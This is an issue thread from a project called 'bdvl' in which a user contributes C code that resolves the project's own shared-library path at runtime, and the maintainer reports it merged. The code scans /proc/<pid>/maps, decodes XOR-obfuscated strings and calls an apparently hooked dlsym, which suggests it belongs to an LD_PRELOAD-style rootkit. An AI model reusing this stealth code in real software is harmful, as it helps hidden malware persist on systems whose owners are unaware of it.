### ISSUE TITLE
Suggest: Resolve library name on runtime.

### ISSUE THREAD

**Issue by wzctggzl** [kcaaj/bdvl#21]
void resident_self(void) {
 return;
}

void resident_resolve_library(void) {
 if(resident_library_name != NULL)
  return;

 // get address of our library's function
 void *global_symbol_handle = dlopen(0, RTLD_LAZY);
 if(global_symbol_handle == NULL)
  return;

 int (*address_self_function)(void);
 char *self_error_ = dlerror();
  resident_xor(_internfunc, INTERNFUNC); // resident_self
   address_self_function = o_dlsym(global_symbol_handle, _internfunc);
  resident_xclean(_internfunc);
 self_error_ = dlerror();
 if(self_error_ != NULL)
  return;

 char str_self_function[32];
 (void)snprintf(str_self_function, 31, "%u", (*address_self_function)());

 const char *str_self_functionaddr = &str_self_function[0];
 unsigned long int int_self_function = strtoul(str_self_functionaddr, NULL, 10);

 if(global_symbol_handle != NULL)
  dlclose(global_symbol_handle);

 // incriment through each loaded library and resolve our function's address
 char procmaps_path[32];
 resident_xor(_procmaps_path, PROCMAPS_PATH); // /proc/%d/maps
  (void)snprintf(procmaps_path, 31, _procmaps_path, resident_pid);
 resident_xclean(_procmaps_path);
 FILE *pmaps_fhandle = call(CFOPEN, procmaps_path, "r");

 if(pmaps_fhandle == NULL)
  return;

 resident_xor(_funcnam, INTERNFUNC);
 resident_xor(_sotrail, SOTRAIL);
  char buf[4096];
  while(fgets(buf, 4095, pmaps_fhandle) != NULL) {
   const char *fpathpos;

   const char *bufaddr = &buf[0];
   fpathpos = strchr(bufaddr, '/');
   if(fpathpos == NULL)
    continue;

   char *quickcheck = strstr(fpathpos, _sotrail);
   if(quickcheck == NULL)
    continue;

   buf[strlen(buf)-1] = 0;

   void *found_lib_handle = dlopen(fpathpos, RTLD_LAZY);
   if(found_lib_handle == NULL)
    continue;

   int (*found_function_address)(void);
   char *found_error_ = dlerror();
   found_function_address = o_dlsym(found_lib_handle, _funcnam);
   found_error_ = dlerror();
   if(found_error_ != NULL) {
    if(found_lib_handle != NULL)
     dlclose(found_lib_handle);
    continue;
   }

   char str_found_func[32];
   memset(str_found_func, 0, 32);
   (void)snprintf(str_found_func, 31, "%u", (*found_function_address)());

   const char *found_func_address = &str_found_func[0];
   unsigned long int int_found_func = strtoul(found_func_address, NULL,10);

   if(found_lib_handle != NULL)
    dlclose(found_lib_handle);

   if(int_found_func == int_self_function) {
    resident_library_name = strdup(fpathpos);
    resident_library_namec = &resident_library_name[0];
    break;
   }
  }
 resident_xclean(_funcnam);
 resident_xclean(_sotrail);

 fclose(pmaps_fhandle);
}

**Comment by kcaaj** [comment]
Implemented in the commit I've just pushed. Thanks.
